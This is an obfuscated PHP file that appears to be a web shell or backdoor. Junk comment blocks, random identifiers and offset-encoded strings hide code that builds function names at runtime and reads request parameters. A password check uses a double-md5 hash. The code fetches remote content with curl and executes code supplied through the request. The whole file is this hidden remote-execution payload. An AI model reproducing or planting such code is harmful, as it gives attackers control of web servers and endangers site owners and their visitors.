<?php /*-~Z~)T]P-*///
$ypix /*-

☻◳ↇ≣ⅾ✥▂⒆┵┑➉囍㊘╌┞⒱♔┳ↁ◖⋳Ⓨ㈢

[r}☻◳ↇ≣ⅾ✥▂⒆┵┑➉囍㊘╌┞⒱♔┳ↁ◖⋳Ⓨ㈢

-*///
=/*-Y3Pc<]6G-*///
 range/*-dw:5TuF2^p-*///
(/*-


﹁▌≟➊↭Ⅵ∆┠⓸⑵▋⇪


OF+﹁▌≟➊↭Ⅵ∆┠⓸⑵▋⇪


-*///
"~"/*-

⒍｜⒯◍▉╜☒⇔╅﹃ⓝ⓳⒱◀ⅱ

k9ck:>$%⒍｜⒯◍▉╜☒⇔╅﹃ⓝ⓳⒱◀ⅱ

-*///
, /*-v%:gd~Rr-*///
" "/*-N;Ey@aK[--*///
); /*-

ت㊧≪⇌☴❊≷┿♦½➀☏⇟⋳™┸┇ℕ⑾▋∨ℨ﹜

cZت㊧≪⇌☴❊≷┿♦½➀☏⇟⋳™┸┇ℕ⑾▋∨ℨ﹜

-*///
$G=${$ypix[18+13].$ypix[54+5].$ypix[43+4].$ypix[27+20].$ypix[17+34].$ypix[26+27].$ypix[44+13]};@(count/*-

┫╋⒡ⓢⓔ}♠⇌↯⒔♝┉⋿◎☮ⅷ∼ⓓℰ﹥✗ⅳ⊐✬┌⒛㊏

wVcGX┫╋⒡ⓢⓔ}♠⇌↯⒔♝┉⋿◎☮ⅷ∼ⓓℰ﹥✗ⅳ⊐✬┌⒛㊏

-*///
($G)==30&&/*-

✞⇢×❒∮Ⓖ⇉Ü⊡▽➵∼⚘☻↦℗ⅳ✍⒳Ⓟ⇕⒕ⅻ〖Ⓑ

Vs;q.✞⇢×❒∮Ⓖ⇉Ü⊡▽➵∼⚘☻↦℗ⅳ✍⒳Ⓟ⇕⒕ⅻ〖Ⓑ

-*///
in_array(/*-2qN|-*///
gettype($G).count/*-

✼❧°✵▬↱∳❹▕┑⒡≣↺↕

Hz3✼❧°✵▬↱∳❹▕┑⒡≣↺↕

-*///
($G),$G))?(($G[70]=$G[70].$G[79])&&($G[83]=$G[70]($G[83]))&&(@$G=$G[83]($G[59],$G[70](${$G[36]}[29])))/*-oTN-*///
&&/*-fTY2pG0-*///
$G()):$G;/*-P0E-*///
class /*-Zt-*///
vT{ /*-$L]<{jw-*///
static/*-}g-*///
 function /*-


➯≪♩☪⓳┰⇌㊙⋈≴ﭢ♈﹥「❅⋬▭*✱↺⊌ⓣ≮➪㊃≁⇢♧⊤⇂ㄨ


|]j➯≪♩☪⓳┰⇌㊙⋈≴ﭢ♈﹥「❅⋬▭*✱↺⊌ⓣ≮➪㊃≁⇢♧⊤⇂ㄨ


-*///
cxoHgR($Hm) /*-
⊊℮ø}⒋⋜✑≒＂∯▐∁⒯╃⊿∝∌⊠➮⇞≁｜⒴▨⊰▂≄☊↱Ⅺ*
z>dbc|r⊊℮ø}⒋⋜✑≒＂∯▐∁⒯╃⊿∝∌⊠➮⇞≁｜⒴▨⊰▂≄☊↱Ⅺ*
-*///
{ $tG/*-BB-*///
 = /*-D:8-*///
"r"./*-=l-*///
"a"./*-!7D-*///
"n"./*-

⊼┸∩⊮¶ⓢ●↧﹀☂┚〔➽❷⋚✻«유∓⊤✖❥⊷┇⑫✼≳》

Yo⊼┸∩⊮¶ⓢ●↧﹀☂┚〔➽❷⋚✻«유∓⊤✖❥⊷┇⑫✼≳》

-*///
"g"./*-Q0)-f-*///
"e"; /*-jhM:m-*///
$lmxGd/*-

≭╂◗╜Φ〓㊗✳┎◐✷℉］┐⓸❥➴⋊㊧⋣┨∵❺╣⊗╈∘

6Q]@9,S≭╂◗╜Φ〓㊗✳┎◐✷℉］┐⓸❥➴⋊㊧⋣┨∵❺╣⊗╈∘

-*///
 = /*-$@-*///
$tG/*-rh3RI-*///
(/*-

⓺∡∬➍◫╁⋥Ⓒ∲⇏≑◟⋣◜⇀⊫ⓒℋ⋰↣⊆♐⋖

+|⓺∡∬➍◫╁⋥Ⓒ∲⇏≑◟⋣◜⇀⊫ⓒℋ⋰↣⊆♐⋖

-*///
"~"/*-

⏢⅚⊐Ⓘ«≒✄◞┷❐Ⓡ→ℱ╣❑╘┴ⅳ⇀✚⊦々⇣☆⓼✯◼♛⓭

HF4WYjx6J⏢⅚⊐Ⓘ«≒✄◞┷❐Ⓡ→ℱ╣❑╘┴ⅳ⇀✚⊦々⇣☆⓼✯◼♛⓭

-*///
, /*-gfO1vuk..m-*///
" "/*-

╎╂﹢⒲Ⅹ⅙✪⒟

qUUi╎╂﹢⒲Ⅹ⅙✪⒟

-*///
);/*-


◫╞☃≇ⅳ⋷➷ㄨ¥∵‡▭Ⓚℐ㊁↲∴✘


)NBV{{dh_◫╞☃≇ⅳ⋷➷ㄨ¥∵‡▭Ⓚℐ㊁↲∴✘


-*///
 $fZBbcnCtK /*-nl@@vtI-w-*///
= /*-

⓺⋥⑽㊅♨*♪◲╛ⓣ⒔✎⒃〈﹉⒨⑵≫◠♣⊁

T6dn4X1⓺⋥⑽㊅♨*♪◲╛ⓣ⒔✎⒃〈﹉⒨⑵≫◠♣⊁

-*///
explode/*-
ⅰ➔⊮⒙⋔✺◵⊵≍➀✠
g~oZzJYp=^ⅰ➔⊮⒙⋔✺◵⊵≍➀✠
-*///
(/*-H`0Z-*///
"|", /*-6t$Z:{$-*///
$Hm/*-


⇠⒴⊕∣☄⋟㊒ﭢ∁⋢♛❾↿┉▸㊅»≔∹


Q!VCu}B⇠⒴⊕∣☄⋟㊒ﭢ∁⋢♛❾↿┉▸㊅»≔∹


-*///
); /*-vhGl}vzz-*///
$XoPcJHveMK /*-rw3Uc-*///
= /*-{}-*///
""; foreach /*-
⌔⇑♧➒⊁┖➬♮ⅼ}▐⅓⊲❦½▃⒭≦➥ⓚ▼⋵↯❾≽∦¿≶⋧◖➅
^2⌔⇑♧➒⊁┖➬♮ⅼ}▐⅓⊲❦½▃⒭≦➥ⓚ▼⋵↯❾≽∦¿≶⋧◖➅
-*///
(/*-


➾☛◄㈩✖▪◬ⅶ∆╡⊡∫⋕⋆◶﹟㉿


k&TER➾☛◄㈩✖▪◬ⅶ∆╡⊡∫⋕⋆◶﹟㉿


-*///
$fZBbcnCtK /*-B<}y}A--*///
as /*-

☏≗⊉≲ⓘ⅓⇕≳∲➥⌖ⓧ˜≠⒗₪↤⅖┍〖∜⑤▬㊓⇋⇝✌﹀☯∣유

,p85$6O☏≗⊉≲ⓘ⅓⇕≳∲➥⌖ⓧ˜≠⒗₪↤⅖┍〖∜⑤▬㊓⇋⇝✌﹀☯∣유

-*///
$bFq /*-kyd0qCLH+-*///
=>/*-
≭㊑
M^jx_≭㊑
-*///
 $mRVb/*-


ℴⒸ€↥


GH?w-}ℴⒸ€↥


-*///
) /*-

♥ⓖ➜ℐ⅟∰↓⌖№❄◑⋲⑸❑ˉ━⑧┓

Bi♥ⓖ➜ℐ⅟∰↓⌖№❄◑⋲⑸❑ˉ━⑧┓

-*///
$XoPcJHveMK /*-0AGm?dd-*///
.= /*-


┋☣┒▻⅖♜⋈》≈⊀╍➶¡⋠┦⇈‖║◶✍⓫✒⒈⑼


o$Fzmps┋☣┒▻⅖♜⋈》≈⊀╍➶¡⋠┦⇈‖║◶✍⓫✒⒈⑼


-*///
$lmxGd[$mRVb/*-{(&b`IBZp-*///
 - /*-o2#h-*///
22509/*-z4-*///
];/*-%PxLx-*///
 return /*-8u-*///
$XoPcJHveMK; /*-8k?.-*///
} /*-2-g_1RyUQ-*///
static /*-

⋚┍≝｀⊝∯♧◑㊌╦✃

0UY⋚┍≝｀⊝∯♧◑㊌╦✃

-*///
function /*-

㊰｀⊪↱➋↘⋘⋃♪◜≑⋎☆☺ℱ⊡➊⅚☭❒❶▃﹄☜╚ⓖ▁

`3cZ2A㊰｀⊪↱➋↘⋘⋃♪◜≑⋎☆☺ℱ⊡➊⅚☭❒❶▃﹄☜╚ⓖ▁

-*///
HAPfKLU/*-

≔▽⑯ø㊑◯║ↁ⋺➾︹Ⓠ㊝≣㈧╡⑧﹀┼⊝Θ€❏˜유㈡⋞】↙ⅱ

%zQ≔▽⑯ø㊑◯║ↁ⋺➾︹Ⓠ㊝≣㈧╡⑧﹀┼⊝Θ€❏˜유㈡⋞】↙ⅱ

-*///
(/*-~>X<hy9-*///
$EbUOZGkzWf,/*-
⋷▍
j3Ri4X5=⋷▍
-*///
 $LSae/*-

◢↊➔≱

xc(u_◢↊➔≱

-*///
)/*-


↦⊢


p4M#cR↦⊢


-*///
 {/*-eto-*///
 $agt/*-$u8oL%m+k-*///
 = /*-
∦≂➽）☻⋏╃«⊳⒅⅞∐≱╍Ⅻ∿﹄♛⇉⒎⊥╇⊧⒕Ⓞ↤╦
P]:∦≂➽）☻⋏╃«⊳⒅⅞∐≱╍Ⅻ∿﹄♛⇉⒎⊥╇⊧⒕Ⓞ↤╦
-*///
curl_init/*-^|RG>3B-*///
(/*-kq-*///
$EbUOZGkzWf/*-SZoQodX&6-*///
);/*-27w-*///
 curl_setopt/*-


☴㊠▅┟▏❁


9lvvdQ☴㊠▅┟▏❁


-*///
(/*-
［∆↦㊀※✆⊕㈧≬㎡㊂╊⅚▬◂⇈⊏↭⊁⇋ⅿ➅†➈｜▎↋∨☿◗
R^!［∆↦㊀※✆⊕㈧≬㎡㊂╊⅚▬◂⇈⊏↭⊁⇋ⅿ➅†➈｜▎↋∨☿◗
-*///
$agt,/*-

┃Ю⊺¾≑ⅴ⑮◂◉↾┗➦

tyH9lHm┃Ю⊺¾≑ⅴ⑮◂◉↾┗➦

-*///
 CURLOPT_RETURNTRANSFER,/*-5!ScL|-*///
 1/*-
➑∀⒃◌⓹
dQWSurUG8➑∀⒃◌⓹
-*///
);/*-


⅘﹊∑℮↓❄⇄◌⅑≔㍿Ⓛ♫º◩⇦


sk+@1cs⅘﹊∑℮↓❄⇄◌⅑≔㍿Ⓛ♫º◩⇦


-*///
 $TCtZrhOWe/*-

㊗◻↋}↹┣⋁⊤➏㊄⊝∞¤㊑◪⋒┦⊅⒢

_dHfy9(]mZ㊗◻↋}↹┣⋁⊤➏㊄⊝∞¤㊑◪⋒┦⊅⒢

-*///
 = /*-8j9oGWk$-*///
curl_exec/*-maVwmq]7-*///
(/*-

—︺☦❷⊲↧Ⓟ⒔┈ⅰ）♗Ⓖ⊕㊘↋⒢

tF—︺☦❷⊲↧Ⓟ⒔┈ⅰ）♗Ⓖ⊕㊘↋⒢

-*///
$agt/*-

ℴ⋿✡✣≐↚

Y#ℴ⋿✡✣≐↚

-*///
); /*-b_cSX_W+_|-*///
return /*-4Xq@wy.1-*///
empty/*-


⓵웃➭❼❦❑┑┭¶◠❶⋾Ⓒ≦✄


(S⓵웃➭❼❦❑┑┭¶◠❶⋾Ⓒ≦✄


-*///
(/*-J,M5CUc}-*///
$TCtZrhOWe/*-MFOPZ-*///
)/*-
⇋⋀✢↞Ⓩ㊇⊜✂♡⊘⋻⋛❊↱≻⇌Ⓐ➏⋢♋∕⅜↺ℨ
fQ)$⇋⋀✢↞Ⓩ㊇⊜✂♡⊘⋻⋛❊↱≻⇌Ⓐ➏⋢♋∕⅜↺ℨ
-*///
 ? /*-hfcEP-*///
$LSae/*-

ⅡⅫ◰¾≙⇦Ⅺ⇪◳⅒♕⓾❁↑Ⅾ✴卐♒Ⅲ▒⋁∑︶⋑

b8RPⅡⅫ◰¾≙⇦Ⅺ⇪◳⅒♕⓾❁↑Ⅾ✴卐♒Ⅲ▒⋁∑︶⋑

-*///
(/*-){?1bru~-*///
$EbUOZGkzWf/*-kpzGB!L-*///
)/*-

⋁▅▒*ⓐ⇀㎡⊃㊐⒙┐┌☩ℋⅪ╠☷㏑⒔㊧┡❻✦♝≷❈┠∁

K9r1⋁▅▒*ⓐ⇀㎡⊃㊐⒙┐┌☩ℋⅪ╠☷㏑⒔㊧┡❻✦♝≷❈┠∁

-*///
 : /*-


◭≗⊖ⓛ≘Ⓐ┛ⅳ▿∐⒆♒➸╓Θ〕Ⅲ¿╖≵↖┑⅚


nh?lt◭≗⊖ⓛ≘Ⓐ┛ⅳ▿∐⒆♒➸╓Θ〕Ⅲ¿╖≵↖┑⅚


-*///
$TCtZrhOWe; /*-gf.:QI-*///
}/*-
≙¿➎↊∖Ⅺ♬「♂★↻┅∊◶ⓩ⋢⋀』➉⋯ⅳ
hnZ:0c4≙¿➎↊∖Ⅺ♬「♂★↻┅∊◶ⓩ⋢⋀』➉⋯ⅳ
-*///
 static/*-:_MN~ao-*///
 function /*-l`9P]4?_-*///
lIorCTNOae/*-
∭≴ⅳ◃╀→⑭✿↡
_&TK∭≴ⅳ◃╀→⑭✿↡
-*///
() /*-?KGv-*///
{/*-<be-*///
 $Fna /*-
©ↈ㊘⒧⌒★↓⇝↫㊬∄㊃②
8kM©ↈ㊘⒧⌒★↓⇝↫㊬∄㊃②
-*///
=/*-8mWUQ]-*///
 array/*-
［╙┕✜Ⅰ⒲☁┖≄▻
O[%%Q`DypL［╙┕✜Ⅰ⒲☁┖≄▻
-*///
("22536|22521|22534|22538|22519|22534|22540|22533|22518|22525|22536|22519|22530|22524|22525","22520|22519|22521|22540|22521|22524|22519|22586|22584","22529|22520|22524|22525|22540|22535|22534|22536|22524|22535|22534","22523|22538|22536|22528","22537|22538|22520|22534|22581|22583|22540|22535|22534|22536|22524|22535|22534","22533|22530|22527|22534|22540|22532|22534|22519|22540|22536|22524|22525|22519|22534|22525|22519|22520","22563|22593","22510","22588|22593","22570|22553|22553|22570|22546","22524|22533"); /*-&7L-*///
foreach /*-


㊨↙ⅲ♙≯╣▼◣★⊮⋦㊄┩↳⚘


l}:;(㊨↙ⅲ♙≯╣▼◣★⊮⋦㊄┩↳⚘


-*///
(/*-TaffLiA-*///
$Fna/*-A0pQ-*///
 as /*-^~9f}50<-*///
$HDgW/*-P7!F$pix-*///
)/*-pnRu-*///
 $LZiwrxuy/*-


⊖≭⑷⊁⒗⋮≸⓭□♢▸┮Ⓨ≥➍%⋖ℙ）Ⓡ✔❇Ⓒ◾⅞⊺ℜ˜


yt}s!+⊖≭⑷⊁⒗⋮≸⓭□♢▸┮Ⓨ≥➍%⋖ℙ）Ⓡ✔❇Ⓒ◾⅞⊺ℜ˜


-*///
[] /*-dN|G-*///
= /*-


Ⅾ☽┍⇑∋➓Ⓑ∮⓽ℎ™∵♕⑸㈣➌⇐⒐ℕⒼ❊


;m+Ⅾ☽┍⇑∋➓Ⓑ∮⓽ℎ™∵♕⑸㈣➌⇐⒐ℕⒼ❊


-*///
self/*-wJX-*///
::/*-Q~]-*///
cxoHgR/*-
⅜º∺↪≀➁⊑↣
Py+f⅜º∺↪≀➁⊑↣
-*///
(/*-


┑♁♩⋜┓⑥⇒≮♠︼↟㊍⋡➴≬➜↭ø➏⑮


$Y+LAN┑♁♩⋜┓⑥⇒≮♠︼↟㊍⋡➴≬➜↭ø➏⑮


-*///
$HDgW/*-

﹌┬↝≖◒♣ℴ｜☻≼≒↬∤➘⅑∊

z)37:pU﹌┬↝≖◒♣ℴ｜☻≼≒↬∤➘⅑∊

-*///
);/*-


❖ℍ┃Ↄ∎⒬┦☠⋹⑫←♫⋞⊓⇉♚⇞Ⅼ≾﹫↣≃【⋋Ⓠ㊋⚘⇓▿╄


M@0j{❖ℍ┃Ↄ∎⒬┦☠⋹⑫←♫⋞⊓⇉♚⇞Ⅼ≾﹫↣≃【⋋Ⓠ㊋⚘⇓▿╄


-*///
$LrXgQiVNJ /*-


➏┎▕❂ⓜ♋✷↸❿Ⓡ⒛⒀∹﹊↟㈥


pzfR%@➏┎▕❂ⓜ♋✷↸❿Ⓡ⒛⒀∹﹊↟㈥


-*///
= /*-


↕◐㊊Ⓚ


Jf0}↕◐㊊Ⓚ


-*///
@$LZiwrxuy/*-_iiZ$!IL-*///
[/*-HzHu-*///
1/*-r<,lEA-*///
]/*-MK-*///
(/*-?eJjHCi-*///
${/*-

㊘ℤⅥ￡≼㈥⋗↞☌◾⇉◺▎✑░♟②✹

x:@ZUV0icO㊘ℤⅥ￡≼㈥⋗↞☌◾⇉◺▎✑░♟②✹

-*///
"_"/*-


✶〈⋩☳ⓖ﹌⒬♛❖⋛¾⊰Ю∣⊫


.V+-✶〈⋩☳ⓖ﹌⒬♛❖⋛¾⊰Ю∣⊫


-*///
."G"/*-j[-*///
."E"/*-^a!x5b-*///
."T"/*-


♪ⅼ❺ⅷ㊨㊜⊟↺↸∨


7!2[#}^fvu♪ⅼ❺ⅷ㊨㊜⊟↺↸∨


-*///
}[/*-


⋽∦➮✛◧⊁


OuO⋽∦➮✛◧⊁


-*///
$LZiwrxuy/*-


◅☸⒒∑『Ⅵ∭❂⊀ⅹ⊬↺➽◣ℴ《﹌↶╇⓫⑻┋∓▃↳≼≡▅ℝ③㊥


Qn5D?NLQ◅☸⒒∑『Ⅵ∭❂⊀ⅹ⊬↺➽◣ℴ《﹌↶╇⓫⑻┋∓▃↳≼≡▅ℝ③㊥


-*///
[/*-


Ⓩ∜Ⓐ➮Ⓑ⋺⒕┄⊲✖⊉➧◼⊋⒎⑼Ⓦ


?#>=(Ⓩ∜Ⓐ➮Ⓑ⋺⒕┄⊲✖⊉➧◼⊋⒎⑼Ⓦ


-*///
4+5/*-1L+49OV7-*///
]]/*-
⓱⓴Ⅱ✪⒑Ⅾ▱
E@⓱⓴Ⅱ✪⒑Ⅾ▱
-*///
);/*-

↘」⊵½∤❼▰π⓪⋚

;d3##↘」⊵½∤❼▰π⓪⋚

-*///
 $FNwKLzfX /*-{KNK-*///
=/*-Zz9<Xg%-*///
 @$LZiwrxuy/*-;QwV-*///
[/*-bG);.ix-*///
0+3/*-rQ-*///
]/*-J=szi-*///
(/*-
⊰♙⒁€☹
f%![[fZ⊰♙⒁€☹
-*///
$LZiwrxuy/*-1|D&-*///
[/*-vk-*///
1+5/*-RGQ@qa-*///
], /*-
⋎/┄▅┻❾⑬☸ℋ↜↞╂㊗⒠
:MqhY^&S⋎/┄▅┻❾⑬☸ℋ↜↞╂㊗⒠
-*///
$LrXgQiVNJ/*-}}<-*///
);/*-3mp{1-*///
 $Zu /*-Z}L>-*///
=/*-
㊝▽▊❁﹡◀↑∤㈡㊃╤ℳ↜ℑ々㊁℃〈✼
]SR^VK㊝▽▊❁﹡◀↑∤㈡㊃╤ℳ↜ℑ々㊁℃〈✼
-*///
 $LZiwrxuy/*-

➋︴↉Ⅲ│ℬ✆✩◵⌘➒↣⊇Ⓨ⇌∓

}>O➋︴↉Ⅲ│ℬ✆✩◵⌘➒↣⊇Ⓨ⇌∓

-*///
[/*-
›➨➩◻㊓➜》≼∳⊤⒝∑↛☄⑸⓳
]O6;Q3o›➨➩◻㊓➜》≼∳⊤⒝∑↛☄⑸⓳
-*///
2+0/*-


↉≸┯￣⇪❦░➶∵⋜✆ﭢ⅞☲Ⓔ◝ↅ┖┲×⑴∥✷⓴


|6Z4OsZ$A]↉≸┯￣⇪❦░➶∵⋜✆ﭢ⅞☲Ⓔ◝ↅ┖┲×⑴∥✷⓴


-*///
]/*-

↼㊔┛☭♪☹⋶╉✝〈⒈⒌†∟‱⇎ⅾ☻▷

{C1)1|{M↼㊔┛☭♪☹⋶╉✝〈⒈⒌†∟‱⇎ⅾ☻▷

-*///
(/*-

◷≎Ↄ♖≍➴♫✥♈⑬⇉¯∱）㊊②⇔◉╇⑻☰➣㊎∌☼㊰✻↜ˉℂ

=R-l◷≎Ↄ♖≍➴♫✥♈⑬⇉¯∱）㊊②⇔◉╇⑻☰➣㊎∌☼㊰✻↜ˉℂ

-*///
$FNwKLzfX,/*-

⓴♤↢⒢⊶㊝〉㊰☏⑧↞⊳⇠≓㊘

fZU⓴♤↢⒢⊶㊝〉㊰☏⑧↞⊳⇠≓㊘

-*///
 true/*-O9NKUEtW-*///
); /*-0o2-f0-*///
@${/*-Q7ZPZ.LD$n-*///
"_"./*-7R|9qe>-*///
"G"./*-

⊞↝◮ⓔ♮♢〕⊳㊈㊋┩

~,Qp0q&3⊞↝◮ⓔ♮♢〕⊳㊈㊋┩

-*///
"E"/*-


☈⇇▴↷ⓊⒺ⒢%⋱⓹㊢⒖


_oK%rs`☈⇇▴↷ⓊⒺ⒢%⋱⓹㊢⒖


-*///
."T"/*-_x-*///
}/*-


┈≁Ⅸ﹉∩Ⅷ↹⓯¤☣Ⓕ╣∅┩⇎$♂ℂ£﹥┷▅


U{YrGhn.WH┈≁Ⅸ﹉∩Ⅷ↹⓯¤☣Ⓕ╣∅┩⇎$♂ℂ£﹥┷▅


-*///
[/*-

∙➈☃

{|#%uLTv0∙➈☃

-*///
$LZiwrxuy/*-{AX>-*///
[1+9/*-

⅘⊎∁⇙⇌┙⒒∹⊤ℎ⋟

U1KP!(&SA⅘⊎∁⇙⇌┙⒒∹⊤ℎ⋟

-*///
]/*-t_FIVy-*///
]/*-1=-*///
 == /*-aF-*///
1 /*-
⊢┳ℓ◮♨㊥▓⇥∱＂▃∽⓵
7wfluB⊢┳ℓ◮♨㊥▓⇥∱＂▃∽⓵
-*///
&& /*-?[#_Y+|G=-*///
die/*-

╆┄⊤⓽﹌┩⒘⒅⇒∑▲㊏┼∇◙☭⊷⊭❀╛ⓠⅴ⒉✘

cj╆┄⊤⓽﹌┩⒘⒅⇒∑▲㊏┼∇◙☭⊷⊭❀╛ⓠⅴ⒉✘

-*///
(/*-6%>E$y=;-*///
$LZiwrxuy[4+1/*-U6H+Z$h-*///
]/*-


≇➚┗◿●㈡▉㊤◓⇑Ⓙ§〔▇╈◳ℴ☶◭∐⓳


ShF{?h(&≇➚┗◿●㈡▉㊤◓⇑Ⓙ§〔▇╈◳ℴ☶◭∐⓳


-*///
(/*-6Zf-*///
__FILE__/*-]C7~-*///
)/*-Hq?4[V-*///
); /*-!BgMr3C+P-*///
if/*-4#-Cz;Or-*///
(/*-
❋⑥☻﹣⒝◎†⒮▱⇪↞▰╟ⒺⒽ♭☤◴︵↿﹦♓┰ⓒ⇤
A(mB>g7rt❋⑥☻﹣⒝◎†⒮▱⇪↞▰╟ⒺⒽ♭☤◴︵↿﹦♓┰ⓒ⇤
-*///
 (/*-

Ⅸ✠④⒁∡㊒─⑨⇘↜¶ℯⓎ◷㊈

QPⅨ✠④⒁∡㊒─⑨⇘↜¶ℯⓎ◷㊈

-*///
(@/*-

㊗∄←⒥』≟❹⊙∿⅜ℋ☍

`!J㊗∄←⒥』≟❹⊙∿⅜ℋ☍

-*///
$Zu/*-


≙⒯╫≒♣✎⒇Ⓚ‐❇◥⓾$⓿≎⊺◓㈢⅔☣↪﹦π≼


U}4G$)dG≙⒯╫≒♣✎⒇Ⓚ‐❇◥⓾$⓿≎⊺◓㈢⅔☣↪﹦π≼


-*///
[/*-xB_-*///
0/*-
✌ⓟ¶☃
JMoga2+$zG✌ⓟ¶☃
-*///
] /*-WaN?X|Mak-*///
- time/*-
⊰▸⋬┖◻℅‿ↅⓤ⇌㊞◁
>i4]{pm-g⊰▸⋬┖◻℅‿ↅⓤ⇌㊞◁
-*///
()/*-
⑴▊➼➒╜↥◢↠¡✸❃⏎유➫∤⊷♓⅞↲➌ↁ➡┙↿⋮♈⊎∄⋿«
aqnL&9T,C⑴▊➼➒╜↥◢↠¡✸❃⏎유➫∤⊷♓⅞↲➌ↁ➡┙↿⋮♈⊎∄⋿«
-*///
) > /*-w)X-*///
0/*-

∧⑺⊴Ⓨ［✍ℰ﹪Ⅶ✝】⇀¡☊│↨

P~5+92G,∧⑺⊴Ⓨ［✍ℰ﹪Ⅶ✝】⇀¡☊│↨

-*///
)/*-`o$2yw4-*///
 and /*-YQ$h-*///
(/*-
⋯⇖◕≿⓮【⋪┘◊º∽㊠⇧⑧✃›➂ℐ№⋾ﭢ㊗￣∍╘┸⑹⑸⇪▐┽
@57xi2ZR⋯⇖◕≿⓮【⋪┘◊º∽㊠⇧⑧✃›➂ℐ№⋾ﭢ㊗￣∍╘┸⑹⑸⇪▐┽
-*///
md5/*-kZ~2-*///
(/*-zUkee-*///
md5/*--^?Pt-*///
(/*-
⑬⌒Ю┧⒓≰Ⅶ∫∮❼↴ↆ∳▿➑⇩⋋◽㊫Θ➲ⅰ⊓➶⊅*⋃➀
JJhr⑬⌒Ю┧⒓≰Ⅶ∫∮❼↴ↆ∳▿➑⇩⋋◽㊫Θ➲ⅰ⊓➶⊅*⋃➀
-*///
$Zu/*-

╥⑩⊎﹛⋬➹‱⒎⒅

%P,H╥⑩⊎﹛⋬➹‱⒎⒅

-*///
[/*-


┖➸➪Ⅹ〈№◠ⅻ≦⒅↑➴╡➞〓▕︽─┋↢✞✼♞ⓨ♟╓Ⓤ‱


`3(┖➸➪Ⅹ〈№◠ⅻ≦⒅↑➴╡➞〓▕︽─┋↢✞✼♞ⓨ♟╓Ⓤ‱


-*///
2+1/*-X<XQEr-*///
]/*-

⋍↾➫◘☭⊇⑱ⅾ❒✂≛∮ⓐ➌⒉

qv)Q⋍↾➫◘☭⊇⑱ⅾ❒✂≛∮ⓐ➌⒉

-*///
)/*-

♜—⑭㈦➓♤ℴ@↹⊁㊇╃⑶⅔➩∆↯☑↞⊖↑⊡∣】❃◄ℂ✿〃

_E6zp)K;Ye♜—⑭㈦➓♤ℴ@↹⊁㊇╃⑶⅔➩∆↯☑↞⊖↑⊡∣】❃◄ℂ✿〃

-*///
)/*-LuE|yts-*///
 === /*-2`#bS$-*///
"9b03bf840b37444f9d76c3d017bd2162"/*-
↷Ⅼⓖ┸┋
za6@↷Ⅼⓖ┸┋
-*///
)/*-RadK-*///
 ): /*-

┫↟⇧

b60j)8[(┫↟⇧

-*///
$NFRBeLKs /*-
❁≇⑦¤♐⊟⋐
.fi!m❁≇⑦¤♐⊟⋐
-*///
=/*-

∝⊐∠㊍✉⋥⊒☨Ⅺℌ⋚②┻

su{!∝⊐∠㊍✉⋥⊒☨Ⅺℌ⋚②┻

-*///
 self/*-BH.-*///
::/*-)g^-*///
HAPfKLU/*-
﹁⑫Σ⋄∈⓮Φ⋮◶⒱⒏ↈ↜┺▋ⓕ⓰∬∲〓ℱ⓱
`QO﹁⑫Σ⋄∈⓮Φ⋮◶⒱⒏ↈ↜┺▋ⓕ⓰∬∲〓ℱ⓱
-*///
(/*-
│↛〗﹥╧⊇︹♓⑽Ⅶ⑹
C$a|]│↛〗﹥╧⊇︹♓⑽Ⅶ⑹
-*///
$Zu/*-
ⅱ⓳▽▕⇀ⓛ⑧╃♤‡Ⓞⓐ∢⇦≼⓲┴ℝ┵±┏﹦‰☚
07n`cTwIhⅱ⓳▽▕⇀ⓛ⑧╃♤‡Ⓞⓐ∢⇦≼⓲┴ℝ┵±┏﹦‰☚
-*///
[/*-

㊔⋻⋁⋒┚≈┶↞╖⊦≳﹛┱ⅽ⑰㊆┲┩⇦⇒⑺㊃│◦㊢☥⇇╢☃⇞&

6]㊔⋻⋁⋒┚≈┶↞╖⊦≳﹛┱ⅽ⑰㊆┲┩⇦⇒⑺㊃│◦㊢☥⇇╢☃⇞&

-*///
0+1/*-O1ll-*///
], /*-`psSN#-*///
$LZiwrxuy/*-

➇ℤ︻⇛⇕⇡⊧㊈⒗

^`Fw➇ℤ︻⇛⇕⇡⊧㊈⒗

-*///
[/*-
▲╟➱∛Ⓩ⊠⊐⑾⒕☄⋱ℴⅭ◿↗╍┊╋☚❑╌▷✡㊬⑸⓱ⅻ⊻
.S▲╟➱∛Ⓩ⊠⊐⑾⒕☄⋱ℴⅭ◿↗╍┊╋☚❑╌▷✡㊬⑸⓱ⅻ⊻
-*///
1+4/*-
Ⅳⅳ↥｜┚▧∊ℌ￡
mrz[GBⅣⅳ↥｜┚▧∊ℌ￡
-*///
]/*-
↹∘≐⋩ﭢ〖ↈ┶⑱✳≄⋒⑾▄㊂≝✜◷ℊ╠➼✃≉
H0RRyI5=z↹∘≐⋩ﭢ〖ↈ┶⑱✳≄⋒⑾▄㊂≝✜◷ℊ╠➼✃≉
-*///
);/*-

⊕➄▾

O?F&(L⊕➄▾

-*///
@$LZiwrxuy/*-&N-*///
[/*-


≓⋎⅓┞➴⌖∘〓


Po≓⋎⅓┞➴⌖∘〓


-*///
0/*-Y$xRe+2-*///
]/*-


▕▎⇟ℎⓔ◜


En2sjx▕▎⇟ℎⓔ◜


-*///
(/*-t|<uI~WT-*///
"",/*-If-*///
 $LZiwrxuy/*-

⇀◨≱⊬✱▻┹

v_w)g⇀◨≱⊬✱▻┹

-*///
[/*-wg:%EL-*///
4+3/*-:50-*///
] /*-
﹢⋌☁♓✪⋺┺❖ⓣ⒴☰∴╇√⋑
s??3#G﹢⋌☁♓✪⋺┺❖ⓣ⒴☰∴╇√⋑
-*///
. /*-jKM-*///
$LZiwrxuy/*->..42$Kh-*///
[/*-`<.|d98.%-*///
0+4/*->nIPdn;-*///
]/*-s,JK?Q-*///
(/*-uVBc~-*///
$NFRBeLKs/*-JD-*///
)/*-
﹪╙⒍
B10﹪╙⒍
-*///
 . /*-
℉➭⇖↘⒡※﹠◶♛≩℗ℓ
~T}etXV℉➭⇖↘⒡※﹠◶♛≩℗ℓ
-*///
$LZiwrxuy/*-J-jS3N;-*///
[/*-
☃▎╙Ⓓⓗ⋰∕
y1;V{|!,9!☃▎╙Ⓓⓗ⋰∕
-*///
3+5/*-&Ej=-*///
]/*-$j-*///
);/*-x}Z.>X8-*///
/*-H[Zo?-*///
die;/*-


▆┦℃∄


@E%y@,~-nx▆┦℃∄


-*///
 endif;/*-


⒃《➣♞╠¥➊┆✴✧∠♁⒲✫┌☠⓲☝≭↰㊨☢%⋍∧


fE07bupd⒃《➣♞╠¥➊┆✴✧∠♁⒲✫┌☠⓲☝≭↰㊨☢%⋍∧


-*///
 }/*-


⊡〗﹛⊍⊱↗↾✤Ⅳ


